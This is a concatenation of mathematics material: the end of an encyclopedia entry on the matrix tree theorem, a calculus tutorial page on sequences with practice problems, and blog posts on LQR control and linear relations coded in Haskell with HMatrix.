$v _ { j }$ to $v_i$. An out-tree is an orientation of a tree having a root of in-degree $0$ and all other vertices of in-degree $1$. An in-tree is an out-tree with its edges reversed. W.T. Tutte [a16] extended the matrix tree theorem by showing that the number of out-trees (respectively, in-trees) rooted at $v_i$ is the value of any cofactor in the $i$th row of $L^-$ (respectively, $i$th column of $L ^ { + }$). In fact, the principal minor of $L$ obtained by deleting rows and columns indexed by $v _ { i_1 } , \dots , v _ { i_k }$ equals the number of spanning forests of $G$ having precisely $k$ out-trees rooted at $v _ { i_1 } , \dots , v _ { i_k }$. In all the approaches it is clear that the significant property of the Laplacian $L$ is that $\sum _ { j } l _ { ij } = 0$ for $1 \leq i \leq \nu$. By allowing $l_{i j}$ to be indeterminates over the field of rational numbers, the generating function version of the matrix tree theorem is obtained [a8], Sect. 3.3.25: The number of trees rooted at $r$ on the vertex set $\{ 1 , \dots , \nu \}$, with $m_{ij}$ occurrences of the edge $\overset{\rightharpoonup} { i j }$ (directed away from the root), is the coefficient of the monomial $\prod _ { i , j } l _ { i j } ^ { m _ { i j } }$ in the $( r , r )$th cofactor of the matrix $[ \delta _ { i j } \alpha _ { i } - l_{i j} ] _ { \nu \times \nu }$, where $m _ { i j } \in \{ 0,1 \}$ and $\alpha_i$ is the sum of the entries in the $i$th row of $L$, for $i = 1 , \dots , \nu$. Several related identities can be found in work by J.W. Moon on labelled trees [a13]. For various proofs of Cayley's formula, see [a14]. Another direction of generalization is to interpret all the minors of the Laplacian rather than just the principal ones. Such generalizations can be found in [a5] and [a2], where arbitrary minors are expressed as signed sums over non-singular substructures that are more complicated than trees. The edge version of the Laplacian is defined to be the $( \epsilon \times \epsilon )$-matrix $K = M ^ { T } M$. The connection of its cofactors with the Wiener index in applications to chemistry is presented in [a11]. The combinatorial description of the arbitrary minors of $K$ when $G$ is a tree is studied in [a1]. Applications are widespread. Variants of the matrix tree theorem are used in the topological analysis of passive electrical networks. The node-admittance matrix considered for this purpose is closely related to the Laplacian matrix (see [a10], Chap. 7). Abundance of forests suggests greater accessibility in networks. Due to this connection, the matrix tree theorem is used in developing distance concepts in social networks (see [a6]). The $C$-matrix which occurs in the design of statistical experiments (cf. also Design of experiments) is the Laplacian of a graph associated with the design. In this context the matrix tree theorem is used to study $D$-optimal designs (see [a7], p. 67). Finally, the matrix tree theorem is closely related to the Perron–Frobenius theorem. If $A$ is the transition matrix of an irreducible Markov chain, then by the Perron–Frobenius theorem it admits a unique stationary distribution. This fact is easily deduced from the matrix tree theorem, which in fact gives an interpretation of the components of the stationary distribution in terms of tree-counts. This observation is used to approximate the stationary distribution of a countable Markov chain (see [a15], p. 222). An excellent survey of interesting developments related to Laplacians may be found in [a12]. #### References [a1] R.B. Bapat, J.W. Grossman, D.M. Kulkarni, "Edge version of the matrix tree theorem for trees" Linear and Multilinear Algebra , 47 (2000) pp. 217–229 [a2] R.B. Bapat, J.W. Grossman, D.M. Kulkarni, "Generalized matrix tree theorem for mixed graphs" Linear and Multilinear Algebra , 46 (1999) pp. 299–312 [a3] N. Biggs, "Algebraic graph theory" , Cambridge Univ. Press (1993) (Edition: Second) [a4] A. Cayley, "A theorem on trees" Quart. J. Math. , 23 (1889) pp. 376–378 [a5] S. Chaiken, "A combinatorial proof of the all minors matrix tree theorem" SIAM J. Algebraic Discr. Math. , 3 : 3 (1982) pp. 319–329 [a6] P.Yu. Chebotarev, E.V. Shamis, "The matrix-forest theorem and measuring relations in small social groups" Automat. Remote Control , 58 : 9:2 (1997) pp. 1505–1514 [a7] G.M. Constantine, "Combinatorial theory and statistical design" , Wiley (1987) [a8] I.P. Goulden, D.M. Jackson, "Combinatorial enumeration" , Wiley (1983) [a9] G. Kirchhoff, "Über die Auflösung der Gleichungen, auf welche man bei der Untersuchung der linearen Verteilung galvanischer Ströme geführt wird" Ann. Phys. Chem. , 72 (1847) pp. 497–508 [a10] W. Mayeda, "Graph theory" , Wiley (1972) [a11] R. Merris, "An edge version of the matrix-tree theorem and the Wiener index" Linear and Multilinear Algebra , 25 (1989) pp. 291–296 [a12] R. Merris, "Laplacian matrices of graphs: a survey" Linear Alg. & Its Appl. , 197/198 (1994) pp. 143–176 [a13] J.W. Moon, "Counting labeled trees" , Canad. Math. Monographs , 1 , Canad. Math. Congress (1970) [a14] J.W. Moon, "Various proofs of Cayley's formula for counting trees" F. Harary (ed.) , A Seminar on Graph Theory , Holt, Rinehart & Winston (1967) pp. 70–78 [a15] E. Seneta, "Non-negative matrices and Markov chains" , Springer (1981) (Edition: Second) [a16] W.T. Tutte, "The disection of equilateral triangles into equilateral triangles" Proc. Cambridge Philos. Soc. , 44 (1948) pp. 463–482 [a17] D.B. West, "Introduction to graph theory" , Prentice-Hall (1996) How to Cite This Entry: Matrix tree theorem. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Matrix_tree_theorem&oldid=50697 This article was adapted from an original article by Ravindra B. BapatJerrold W. GrossmanDevadatta M. Kulkarni (originator), which appeared in Encyclopedia of Mathematics - ISBN 1402006098. See original article
Limits Derivatives Integrals Infinite Series Parametrics Polar Coordinates Conics Limits Epsilon-Delta Definition Finite Limits One-Sided Limits Infinite Limits Trig Limits Pinching Theorem Indeterminate Forms L'Hopitals Rule Limits That Do Not Exist Continuity & Discontinuities Intermediate Value Theorem Derivatives Power Rule Product Rule Quotient Rule Chain Rule Trig and Inverse Trig Implicit Differentiation Exponentials & Logarithms Logarithmic Differentiation Hyperbolic Functions Higher Order Derivatives Differentials Slope, Tangent, Normal... Linear Motion Mean Value Theorem Graphing 1st Deriv, Critical Points 2nd Deriv, Inflection Points Related Rates Basics Related Rates Areas Related Rates Distances Related Rates Volumes Optimization Integrals Definite Integrals Integration by Substitution Integration By Parts Partial Fractions Improper Integrals Basic Trig Integration Sine/Cosine Integration Secant/Tangent Integration Trig Integration Practice Trig Substitution Linear Motion Area Under/Between Curves Volume of Revolution Arc Length Surface Area Work Moments, Center of Mass Exponential Growth/Decay Laplace Transforms Describing Plane Regions Infinite Series Divergence (nth-Term) Test p-Series Geometric Series Alternating Series Telescoping Series Ratio Test Limit Comparison Test Direct Comparison Test Integral Test Root Test Absolute Convergence Conditional Convergence Power Series Taylor/Maclaurin Series Interval of Convergence Remainder & Error Bounds Fourier Series Study Techniques Choosing A Test Sequences Infinite Series Table Practice Problems Exam Preparation Exam List Parametrics Parametric Curves Parametric Surfaces Slope & Tangent Lines Area Arc Length Surface Area Volume Polar Coordinates Converting Slope & Tangent Lines Area Arc Length Surface Area Conics Parabolas Ellipses Hyperbolas Conics in Polar Form Vectors Vector Functions Partial Derivatives/Integrals Vector Fields Laplace Transforms Tools Vectors Unit Vectors Dot Product Cross Product Lines In 3-Space Planes In 3-Space Lines & Planes Applications Angle Between Vectors Direction Cosines/Angles Vector Projections Work Triple Scalar Product Triple Vector Product Vector Functions Projectile Motion Unit Tangent Vector Principal Unit Normal Vector Acceleration Vector Arc Length Arc Length Parameter Curvature Vector Functions Equations MVC Practice Exam A1 Partial Derivatives Directional Derivatives Lagrange Multipliers Tangent Plane MVC Practice Exam A2 Partial Integrals Describing Plane Regions Double Integrals-Rectangular Double Integrals-Applications Double Integrals-Polar Triple Integrals-Rectangular Triple Integrals-Cylindrical Triple Integrals-Spherical MVC Practice Exam A3 Vector Fields Curl Divergence Conservative Vector Fields Potential Functions Parametric Curves Line Integrals Green's Theorem Parametric Surfaces Surface Integrals Stokes' Theorem Divergence Theorem MVC Practice Exam A4 Laplace Transforms Unit Step Function Unit Impulse Function Square Wave Shifting Theorems Solve Initial Value Problems Prepare For Calculus 1 Trig Formulas Describing Plane Regions Parametric Curves Linear Algebra Review Word Problems Mathematical Logic Calculus Notation Simplifying Practice Exams More Math Help Tutoring Tools and Resources Learning/Study Techniques Math/Science Learning Memorize To Learn Music and Learning Note-Taking Motivation Instructor or Coach? Books Math Books You CAN Ace Calculus 17calculus > infinite series > sequences Calculus Main Topics Single Variable Calculus Multi-Variable Calculus Tools math tools general learning tools Sequences Infinite sequences are an important introduction to infinite series, since infinite series are built upon infinite sequences. Notice the difference. Sequence Series A sequence is just a list of items separated by commas. With a series, we actually add up some (or all) terms of some sequence. Sequences can be infinite (have an infinite number of terms) or finite (have a finite number of terms). Example 1: $$\{ 1, 2, 3, 4, 5 \}$$ Example 2: $$\{ 1, 4, 9, 16, 25, 36, . . . \}$$ This is a finite sequence since it has a finite number of elements, i.e. after the number $$5$$ there are no more numbers in the sequence and it stops. This is an infinite sequence since it has an infinite number of elements. The infinite part is denoted by the three periods at the end of the list. We don't always list the elements of a sequence. If there is a logical pattern, we can write it more compact form as an equation. This idea is discussed in the next section on notation. Notation Sequences may be written in several different ways. These are the ones you will come across the most in calculus. 1. As a list of items; we showed this in the two examples above. 2. $$\displaystyle{\{a_n\}_{n=1}^{n=\infty}}$$ or more simply as $$\displaystyle{\{a_n\}_{1}^{\infty}}$$; in example 2 above, we would also include what $$a_n$$ was, i.e. $$a_n = n^2$$. 3. Similar to the last way, we could write the sequence in example 2 above as $$\displaystyle{\{n^2\}_{n=1}^{n=\infty}}$$; in this case, $$a_n$$ is implied to be $$a_n = n^2$$. 4. You also often see a sequence written without specifying $$n$$, i.e $$\{a_n\}$$ and n is implied as $$n = 1, 2, 3, . . . \infty$$ 5. A sequence can also be built from itself, called a recursive sequence. In these types of sequences, the first few terms are given and the following terms are defined based on those first terms. For example, $$a_1 = 1, ~~ a_{n+1} = 2a_n$$. 6. Finally, you can describe a sequence with words. This is shown in practice problem C01 below. This is a very unusual way to do it, so you won't see it much. The whole idea is to emphasize that a sequence is a LIST of elements. Each element stands alone and does not interact at all with any other element. Here is quick introduction video clip that will get you started. It has a couple of good examples. PatrickJMT - Sequences Arithmetic Sequence One special type of sequence is an arithmetic sequence, which looks like $$\{ a_n \}$$ where $$a_n = c+nk$$, $$c$$ and $$k$$ are constants. An example is $$\{ 3, 12, 21, 30, . . . \}$$. Notice that in this example, we start with $$3$$ and add $$9$$ to get the next element. Geometric Sequence Another special type of sequence is a geometric sequence. This sequence looks like $$\{ a_n \} = \{ c, cr, cr^2, cr^3, . . . \}$$ where the terms are of the form $$a_n = cr^n$$ for $$n=0, 1, 2 . . .$$ $$c$$ is a constant $$r$$ is a term that does not contain $$n$$. An example is $$\{ 1, 3, 9, 27, 81, . . . \}$$ where we start with $$1$$ and multiply by $$3$$ to get the next element. Compare this to the arithmetic sequence where we add to get the next element. Sequence Convergence and Divergence Convergence of a sequence is defined as the limit of the terms approaching a specific real number. In equation terms, it looks like this. For a sequence $$\{a_n\}$$ where $$n=\{1, 2, 3, 4, . . . \}$$, we calculate $$\displaystyle{ \lim_{n \to \infty}{a_n} = L }$$ Convergence: If $$L$$ is a real number, then we say that the sequence $$\{a_n\}$$ converges to $$L$$. Divergence: If $$L = \pm \infty$$ or the limit cannot be determined, i.e. it is undefined, then the sequence is said to diverge. Note: The index $$n$$ can start at zero instead of one. This is what happened with the geometric sequence shown in the previous section. In actuality, the index can start at any number. However, for consistency, we usually start it at either zero or one. Using L'Hôpital's Rule When evaluating the limit $$\displaystyle{ \lim_{n \to \infty}{a_n} = L }$$, we sometimes need to use L'Hôpital's Rule. In the course of using L'Hôpital's Rule, we will need to take some derivatives. However, derivatives are only defined on continuous functions. And since a sequence is a set of discontinuous values, we can't directly use L'Hôpital's Rule. Fortunately, we have a theorem that will help us. Theorem If we can find a continuous function, call it $$g(x)$$ where $$g(n) = a_n$$ for all $$n$$, then $$\displaystyle{ \lim_{x \to \infty}{g(x)} = \lim_{n \to \infty}{a_n} }$$. Finding a function $$g(x)$$ is not usually that hard, if $$a_n$$ is given in equation terms. Just replace $$n$$ with $$x$$. I know this seems kind of picky but you need to get used to following the exact requirements of theorem. That is one reason we suggest that you read through and try to understand proofs in calculus. Okay, let's get down to some details and how to work with sequences. These next two videos will help you a lot. This video is a bit long but well worth taking the time to watch. It contains a lot of detail about sequences and how to work with them and has plenty of good examples. Dr Chris Tisdell - Sequences (part 1) This video is a continuation of the previous video and is not as long but it discusses the core of sequences, boundedness and convergence behaviour. You need to watch the previous video first to get the context before watching this one. Dr Chris Tisdell - Sequences (part 2) Binomial Theorem The binomial theorem is a way to expand a term in the form $$(a+b)^n$$ into a series. We do not cover this topic extensively at this time but here is a video to get you started with an explanation of the equation and an example. PatrickJMT - The Binomial Theorem Okay, time for some practice problems. After that, you will be ready to begin working with infinite series. infinite series → Search 17Calculus Practice Problems Instructions - - Unless otherwise instructed, write the first few terms of these sequences and determine if they converge or diverge. If not specified, start the index at n=1. Level A - Basic Practice A01 $$\displaystyle{ \left\{ \frac{2n}{6n-5} \right\} }$$ solution Practice A02 $$\displaystyle{\left\{\frac{n+1}{n^2}\right\}_{n=1}^{n=\infty}}$$ solution Practice A03 $$\displaystyle{\left\{\frac{3n^2-1}{10n+4n^2}\right\}_{n=2}^{n=\infty}}$$ solution Practice A04 Find the limit of the sequence $$\{a_n\}$$ where $$\displaystyle{a_n=\frac{2n}{5n-3}}$$. solution Practice A05 Find the limit of the sequence $$\{a_n\}$$ where $$\displaystyle{a_n=\frac{n^2-n+7}{2n^3+n^2}}$$. solution Practice A06 Find the nth term of the sequence $$\{ 1, 4, 9, 16 . . . \}$$ solution Practice A07 Find a formula for the general term $$a_n$$ of the sequence $$\displaystyle{ \left\{ \frac{1}{2}, -\frac{4}{3}, \frac{9}{4}, -\frac{16}{5}, \frac{25}{6}, . . . \right\} }$$ solution Practice A08 $$\{n(n-1)\}$$ solution Practice A09 $$\displaystyle{\left\{1+\left(-\frac{1}{2}\right)^n\right\}}$$ solution Practice A10 Compute $$\displaystyle{\lim_{n\to\infty}{\frac{\ln(n)}{n}} }$$ solution Practice A11 Compute $$\displaystyle{\lim_{n\to\infty}{\sqrt[n]{n}} }$$ using the result from the previous problem. solution Level B - Intermediate Practice B01 $$\displaystyle{\left\{\frac{(-1)^{n+1}}{3^n}\right\}_{n=0}^{n=\infty}}$$ solution Practice B02 For the sequence $$\displaystyle{\left\{\frac{1}{2n+3}\right\}}$$ determine whether it is increasing, decreasing, monotonic and if it is bounded. Explain your reasoning. solution Practice B03 $$\displaystyle{\left\{\frac{e^{3n}}{n^2}\right\}}$$ solution Practice B04 $$\displaystyle{\left\{\frac{2^n}{3^{n+1}}\right\}}$$ solution Write down the first few terms of the sequence $$\displaystyle{\{a_n\}}$$ where $$a_n$$ is the nth digit of $$e$$ and discuss the convergence or divergence of the sequence.
## Categorical LQR Control with Linear Relations Last time, I described and built an interesting expansion of describing systems via linear functions, that of using linear relations. We remove the requirement that mappings be functional (exactly one output vector for any given input vector), which extends our descriptive capability. This is useful for describing “open” pieces of a linear system like electric circuits. This blog post is about another application: linear dynamical systems and control. Linear relations are an excellent tool for reachability/controllability. In a control system, it is important to know where it is possible to get the system to. With linear dynamics $x_{t+1} = Ax_{t} + B u_{t}$, an easy controllability question is “can my system reach into some subspace”. This isn’t quite the most natural question physically, but it is natural mathematically. My first impulse would be to ask “given the state starts in this little region over here, can it get to this little region over here”, but the subspace question is a bit easier to answer. It’s a little funky but it isn’t useless. It can detect if the control parameter only touches 1 of 2 independent dynamical systems for example. We can write the equations of motion as a linear relation and iterate composition on them. See Erbele for more. There is a set of different things (and kind of more interesting things) that are under the purview of linear control theory, LQR Controllers and Kalman filters. The LQR controller and Kalman filter are roughly (exactly?) the same thing mathematically. At an abstract mathematical level, they both rely on the fact that optimization of a quadratic objective $x^T Q x + r^T x + c$ with a linear constraints $Ax=b$ is solvable in closed form via linear algebra. The cost of the LQR controller could be the squared distance to some goal position for example. When you optimize a function, you set the derivative to 0. This is a linear equation for quadratic objectives. It is a useful framework because it has such powerful computational teeth. The Kalman filter does a similar thing, except for the problem of state estimation. There are measurements linear related to the state that you want to match with the prior knowledge of the linear dynamics of the system and expected errors of measurement and environment perturbations to the dynamics. There are a couple different related species of these filters. We could consider discrete time or continuous time. We can also consider infinite horizon or finite horizon. I feel that discrete time and finite horizon are the most simple and fundamental so that is what we’ll stick with. The infinite horizon and continuous time are limiting cases. We also can consider the dynamics to be fixed for all time steps, or varying with time. Varying with time is useful for the approximation of nonlinear systems, where there are different good nonlinear approximation (taylor series of the dynamics) depending on the current state. There are a couple ways to solve a constrained quadratic optimization problem. In some sense, the most conceptually straightforward is just to solve for a span of the basis (the “V-Rep” of my previous post) and plug that in to the quadratic objective and optimize over your now unconstrained problem. However, it is commonplace and elegant in many respects to use the Lagrange multiplier method. You introduce a new parameter for every linear equality and add a term to the objective $\lambda^T (A x - b)$. Hypothetically this term is 0 for the constrained solution so we haven’t changed the objective in a sense. It’s a funny slight of hand. If you optimize over x and $\lambda$, the equality constraint comes out as your gradient conditions on $\lambda$. Via this method, we convert a linearly constrained quadratic optimization problem into an unconstrained quadratic optimization problem with more variables. Despite feeling very abstract, the value these Lagrangian variables take on has an interpretation. They are the “cost” or “price” of the equality they correspond to. If you moved the constraint by an amount $Ax - b + \epsilon$, you would change the optimal cost by an amount $\lambda \epsilon$. (Pretty sure I have that right. Units check out. See Boyd https://www.youtube.com/watch?v=FJVmflArCXc) The Lagrange multipliers enforcing the linear dynamics are called the co-state variables. They represent the “price” that the dynamics cost, and are derivatives of the optimal value function V(s) (The best value that can be achieved from state s) that may be familiar to you from dynamic programming or reinforcement learning. See references below for more. Let’s get down to some brass tacks. I’ve suppressed some terms for simplicity. You can also add offsets to the dynamics and costs. A quadratic cost function with lagrange multipliers. Q is a cost matrix associated with the x state variables, R is a cost matrix for the u control variables. $C = \lambda_0 (x_0 - \tilde{x}_0) + \sum_t x_t^T Q x_t + u_t^T R u_t + \lambda_{t+1}^T (x_{t+1} - A x_t - B u_t )$ Equations of motion results from optimizing with respect to $\lambda$ by design. $\nabla_{\lambda_{t+1}} C = x_{t+1} - A x_t - B u_t = 0$. The initial conditions are enforced by the zeroth multiplier. $\nabla_{\lambda_0} C = x_i - x_{0} = 0$ Differentiation with respect to the state x has the interpretation of backwards iteration of value derivative, somewhat related to what one finds in the Bellman equation. $\nabla_{x_t} C = Q x_{t} + A^T \lambda_{t+1} - \lambda_{t} = 0 \Longrightarrow \lambda_{t} = A^T \lambda_{t+1} + Q x_{t}$ The final condition on value derivative is the one that makes it the most clear that the Lagrange multiplier has the interpretation of the derivative of the value function, as it sets it to that. $\nabla_{x_N} C = Q x_N - \lambda_{N} = 0$ Finally, differentiation with respect to the control picks the best action given knowledge of the value function at that time step. $\nabla_{u_t} C = R u_{t} - B^T \lambda_t = 0$ Ok. Let’s code it up using linear relations. Each of these conditions is a separate little conceptual box. We can build the optimal control step relation by combining these updates together The following is a bit sketchy. I am confident it makes sense, but I’m not confident that I have all of the signs and other details correct. I also still need to add the linear terms to the objective and offset terms to the dynamics. These details are all kind of actually important. Still, I think it’s nice to set down in preliminary blog form. ### Bits and Bobbles • The code in context https://github.com/philzook58/ConvexCat/blob/master/src/LinRel.hs • Some of the juicier stuff is nonlinear control. Gotta walk before we can run though. I have some suspicions that a streaming library may be useful here, or a lens-related approach. Also ADMM. • Reminiscent of Keldysh contour. Probably a meaningless coincidence. • In some sense H-Rep is the analog of (a -> b -> Bool) and V-rep [(a,b)] • Note that the equations of motion are relational rather than functional for a control systems. The control parameters $u$ describe undetermined variables under our control. • Loopback (trace) the value derivative for infinite horizon control. • Can solve the Laplace equation with a Poincare Steklov operator. That should be my next post. • There is something a touch unsatisfying even with the reduced goals of this post. Why did I have to write down the quadratic optimization problem and then hand translate it to linear relations? It’s kind of unacceptable. The quadratic optimization problem is really the most natural statement, but I haven’t figured out to make it compositional. The last chapter of Rockafellar? ### References https://arxiv.org/abs/1405.6881 Baez and Erbele – Categories in Control http://www.scholarpedia.org/article/Optimal_control http://www.argmin.net/2016/05/18/mates-of-costate/ – interesting analogy to backpropagation. Lens connection? https://courses.cs.washington.edu/courses/cse528/09sp/optimality_chapter.pdf ## Linear Relation Algebra of Circuits with HMatrix Oooh this is a fun one. I’ve talked before about relation algebra and I think it is pretty neat. http://www.philipzucker.com/a-short-skinny-on-relations-towards-the-algebra-of-programming/. In that blog post, I used finite relations. In principle, they are simple to work with. We can perform relation algebra operations like composition, meet, and join by brute force enumeration. Unfortunately, brute force may not always be an option. First off, the finite relations grow so enormous as to be make this infeasible. Secondly, it is not insane to talk about relations or regions with an infinite number of elements, such as some continuous blob in 2D space. In that case, we can’t even in principle enumerate all the points in the region. What are we to do? We need to develop some kind of finite parametrization of regions to manipulate. This parametrization basically can’t possibly be complete in some sense, and we may choose more or less powerful systems of description for computational reasons. In this post, we are going to be talking about linear or affine subspaces of a continuous space. These subspaces are hyperplanes. Linear subspaces have to go through the origin, while affine spaces can have an offset from the origin. In the previous post, I mentioned that the finite relations formed a lattice, with operations meet and join. These operations were the same as set intersection and union so the introduction of the extra terminology meet and join felt a bit unwarranted. Now the meet and join aren’t union and intersection anymore. We have chosen to not have the capability to represent the union of two vectors, instead we can only represent the smallest subspace that contains them both, which is the union closed under vector addition. For example, the join of a line and point will be the plane that goes through both. Linear/Affine stuff is great because it is so computational. Most questions you cant to ask are answerable by readily available numerical linear algebra packages. In this case, we’ll use the Haskell package HMatrix, which is something like a numpy/scipy equivalent for Haskell. We’re going to use type-level indices to denote the sizes and partitioning of these spaces so we’ll need some helper functions. In case I miss any extensions, make typos, etc, you can find a complete compiling version here https://github.com/philzook58/ConvexCat/blob/master/src/LinRel.hs type BEnum a = (Enum a, Bounded a) -- cardinality. size was already taken by HMatrix :( card :: forall a. (BEnum a) => Int card = (fromEnum (maxBound @a)) - (fromEnum (minBound @a)) + 1 In analogy with sets of tuples for defining finite relations, we partition the components of the linear spaces to be “input” and “output” indices/variables $\begin{bmatrix} x_1 & x_2 & x_3 & ... & y_1 & y_2 & y_3 & ... \end{bmatrix}$. This partition is somewhat arbitrary and easily moved around, but the weakening of strict notions of input and output as compared to functions is the source of the greater descriptive power of relations. Relations are extensions of functions, so linear relations are an extension of linear maps. A linear map has the form $y = Ax$. A linear relation has the form $Ax + By = 0$. An affine map has the form $y = Ax + b$ and an affine relation has the form $Ax + By = b$. There are at least two useful concrete representation for subspaces. 1. We can write a matrix $A$ and vector $b$ down that corresponds to affine constraints. $Ax = b$. The subspace described is the nullspace of $A$ plus a solution of the equation. The rows of A are orthogonal to the space. 2. We can hold onto generators of subspace. $x = A' l+b$ where l parametrizes the subspace. In other words, the subspace is generated by / is the span of the columns of $A'$. It is the range of $A'$. We’ll call these two representations the H-Rep and V-Rep, borrowing terminology from similar representations in polytopes (describing a polytope by the inequalities that define it’s faces or as the convex combination of it’s vertices). https://inf.ethz.ch/personal/fukudak/lect/pclect/notes2015/PolyComp2015.pdf These two representations are dual in many respects. -- HLinRel holds A x = b constraint data HLinRel a b = HLinRel (Matrix Double) (Vector Double) deriving Show -- x = A l + b. Generator constraint. data VLinRel a b = VLinRel (Matrix Double) (Vector Double) deriving Show It is useful to have both reps and interconversion routines, because different operations are easy in the two representations. Any operations defined on one can be defined on the other by sandwiching between these conversion functions. Hence, we basically only need to define operations for one of the reps (if we don’t care too much about efficiency loss which, fair warning, is out the window for today). The bulk of computation will actually be performed by these interconversion routines. The HMatrix function nullspace performs an SVD under the hood and gathers up the space with 0 singular values. -- if A x = b then x is in the nullspace + a vector b' solves the equation h2v :: HLinRel a b -> VLinRel a b h2v (HLinRel a b) = VLinRel a' b' where b' = a <\> b -- least squares solution a' = nullspace a -- if x = A l + b, then A' . x = A' A l + A' b = A' b because A' A = 0 v2h :: VLinRel a b -> HLinRel a b v2h (VLinRel a' b') = HLinRel a b where b = a #> b' -- matrix multiply a = tr $nullspace (tr a') -- orthogonal space to range of a. -- tr is transpose and not trace? A little bit odd, HMatrix. These linear relations form a category. I’m not using the Category typeclass because I need BEnum constraints hanging around. The identity relations is $x = y$ aka $Ix - Iy = 0$. hid :: forall a. BEnum a => HLinRel a a hid = HLinRel (i ||| (- i)) (vzero s) where s = card @a i = ident s Composing relations is done by combining the constraints of the two relations and then projecting out the interior variables. Taking the conjunction of constraints is easiest in the H-Rep, where we just need to vertically stack the individual constraints. Projection easily done in the V-rep, where you just need to drop the appropriate section of the generator vectors. So we implement this operation by flipping between the two. hcompose :: forall a b c. (BEnum a, BEnum b, BEnum c) => HLinRel b c -> HLinRel a b -> HLinRel a c hcompose (HLinRel m b) (HLinRel m' b') = let a'' = fromBlocks [[ ma', mb' , 0 ], [ 0 , mb, mc ]] in let b'' = vjoin [b', b] in let (VLinRel q p) = h2v (HLinRel a'' b'') in -- kind of a misuse let q' = (takeRows ca q) -- drop rows belonging to @b === (dropRows (ca + cb) q) in let [x,y,z] = takesV [ca,cb,cc] p in let p'= vjoin [x,z] in -- rebuild without rows for @b v2h (VLinRel q' p') -- reconstruct HLinRel where ca = card @a cb = card @b cc = card @c sb = size b -- number of constraints in first relation sb' = size b' -- number of constraints in second relation ma' = takeColumns ca m' mb' = dropColumns ca m' mb = takeColumns cb m mc = dropColumns cb m (<<<) :: forall a b c. (BEnum a, BEnum b, BEnum c) => HLinRel b c -> HLinRel a b -> HLinRel a c (<<<) = hcompose We can implement the general cadre of relation operators, meet, join, converse. I feel the converse is the most relational thing of all. It makes inverting a function nearly a no-op. hjoin :: HLinRel a b -> HLinRel a b -> HLinRel a b hjoin v w = v2h$ vjoin' (h2v v) (h2v w) -- hmatrix took vjoin from me :( -- joining means combining generators and adding a new generator -- Closed under affine combination l * x1 + (1 - l) * x2 vjoin' :: VLinRel a b -> VLinRel a b -> VLinRel a b vjoin' (VLinRel a b) (VLinRel a' b') = VLinRel (a ||| a' ||| (asColumn (b - b'))) b -- no constraints, everything -- trivially true htop :: forall a b. (BEnum a, BEnum b) => HLinRel a b htop = HLinRel (vzero (1,ca + cb)) (konst 0 1) where ca = card @a cb = card @b -- hbottom? hconverse :: forall a b. (BEnum a, BEnum b) => HLinRel a b -> HLinRel b a hconverse (HLinRel a b) = HLinRel ( (dropColumns ca a) ||| (takeColumns ca a)) b where ca = card @a cb = card @b Relational inclusion is the question of subspace inclusion. It is fairly easy to check if a VRep is in an HRep (just see plug the generators into the constraints and see if they obey them) and by using the conversion functions we can define it for arbitrary combos of H and V. -- forall l. A' ( A l + b) == b' -- is this numerically ok? I'm open to suggestions. vhsub :: VLinRel a b -> HLinRel a b -> Bool vhsub (VLinRel a b) (HLinRel a' b') = (naa' <= 1e-10 * (norm_2 a') * (norm_2 a) ) && ((norm_2 ((a' #> b) - b')) <= 1e-10 * (norm_2 b') ) where naa' = norm_2 (a' <> a) hsub :: HLinRel a b -> HLinRel a b -> Bool hsub h1 h2 = vhsub (h2v h1) h2 heq :: HLinRel a b -> HLinRel a b -> Bool heq a b = (hsub a b) && (hsub b a) instance Ord (HLinRel a b) where (<=) = hsub (>=) = flip hsub instance Eq (HLinRel a b) where (==) = heq It is useful the use the direct sum of the spaces as a monoidal product. hpar :: HLinRel a b -> HLinRel c d -> HLinRel (Either a c) (Either b d) hpar (HLinRel mab v) (HLinRel mcd v') = HLinRel (fromBlocks [ [mab, 0], [0 , mcd]]) (vjoin [v, v']) where hleft :: forall a b. (BEnum a, BEnum b) => HLinRel a (Either a b) hleft = HLinRel ( i ||| (- i) ||| (konst 0 (ca,cb))) (konst 0 ca) where ca = card @a cb = card @b i = ident ca hright :: forall a b. (BEnum a, BEnum b) => HLinRel b (Either a b) hright = HLinRel ( i ||| (konst 0 (cb,ca)) ||| (- i) ) (konst 0 cb) where ca = card @a cb = card @b i = ident cb htrans :: HLinRel a (Either b c) -> HLinRel (Either a b) c htrans (HLinRel m v) = HLinRel m v hswap :: forall a b. (BEnum a, BEnum b) => HLinRel (Either a b) (Either b a) hswap = HLinRel (fromBlocks [[ia ,0,0 ,-ia], [0, ib,-ib,0]]) (konst 0 (ca + cb)) where ca = card @a cb = card @b ia = ident ca ib = ident cb hsum :: forall a. BEnum a => HLinRel (Either a a) a hsum = HLinRel ( i ||| i ||| - i ) (konst 0 ca) where ca = card @a i= ident ca hdup :: forall a. BEnum a => HLinRel a (Either a a) hdup = HLinRel (fromBlocks [[i, -i,0 ], [i, 0, -i]]) (konst 0 (ca + ca)) where ca = card @a i= ident ca hdump :: HLinRel a Void hdump = HLinRel 0 0 hlabsorb ::forall a. BEnum a => HLinRel (Either Void a) a hlabsorb = HLinRel m v where (HLinRel m v) = hid @a A side note: Void causes some consternation. Void is the type with no elements and is the index type of a 0 dimensional space. It is the unit object of the monoidal product. Unfortunately by an accident of the standard Haskell definitions, actual Void is not a BEnum. So, I did a disgusting hack. Let us not discuss it more. ### Circuits Baez and Fong have an interesting paper where they describe building circuits using a categorical graphical calculus. We have the pieces to go about something similar. What we have here is a precise way in which circuit diagrams can be though of as string diagrams in a monoidal category of linear relations. An idealized wire has two quantities associated with it, the current flowing through it and the voltage it is at. -- a 2d space at every wire or current and voltage. data IV = I | V deriving (Show, Enum, Bounded, Eq, Ord) When we connect wires, the currents must be conserved and the voltages must be equal. hid and hcompose from above still achieve that. Composing two independent circuits in parallel is achieve by hpar. We will want some basic tinker toys to work with. A resistor in series has the same current at both ends and a voltage drop proportional to the current resistor :: Double -> HLinRel IV IV resistor r = HLinRel ( (2><4) [ 1,0,-1, 0, r, 1, 0, -1]) (konst 0 2) Composing two resistors in parallel adds the resistance. (resistor r1) <<< (resistor r2) == resistor (r1 + r2)) A bridging resistor allows current to flow between the two branches bridge :: Double -> HLinRel (Either IV IV) (Either IV IV) bridge r = HLinRel ( (4><8) [ 1,0, 1, 0, -1, 0, -1, 0, -- current conservation 0, 1, 0, 0, 0, -1 , 0, 0, --voltage maintained left 0, 0, 0, 1, 0, 0, 0, -1, -- voltage maintained right r, 1, 0,-1, -r, 0, 0, 0 ]) (konst 0 4) Composing two bridge circuits is putting the bridge resistors in parallel. The conductance $G=\frac{1}{R}$ of resistors in parallel adds. hcompose (bridge r1) 